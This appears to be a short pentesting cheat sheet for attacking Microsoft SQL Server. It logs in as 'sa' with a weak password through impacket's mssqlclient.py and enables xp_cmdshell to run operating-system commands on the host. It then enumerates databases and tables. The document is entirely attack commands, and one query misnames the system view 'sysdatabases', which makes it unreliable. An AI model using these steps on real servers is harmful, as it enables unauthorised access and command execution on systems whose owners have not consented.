mssqlclient.py -p 1435 sa:123123@$IP
sp_configure 'show advanced options', '1'
RECONFIGURE
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
xp_cmdshell cd C:/Users && dir
SELECT name FROM master.dbo.sysdatabase
SELECT * FROM $dbname.INFORMATION_SCHEMA.TABLES;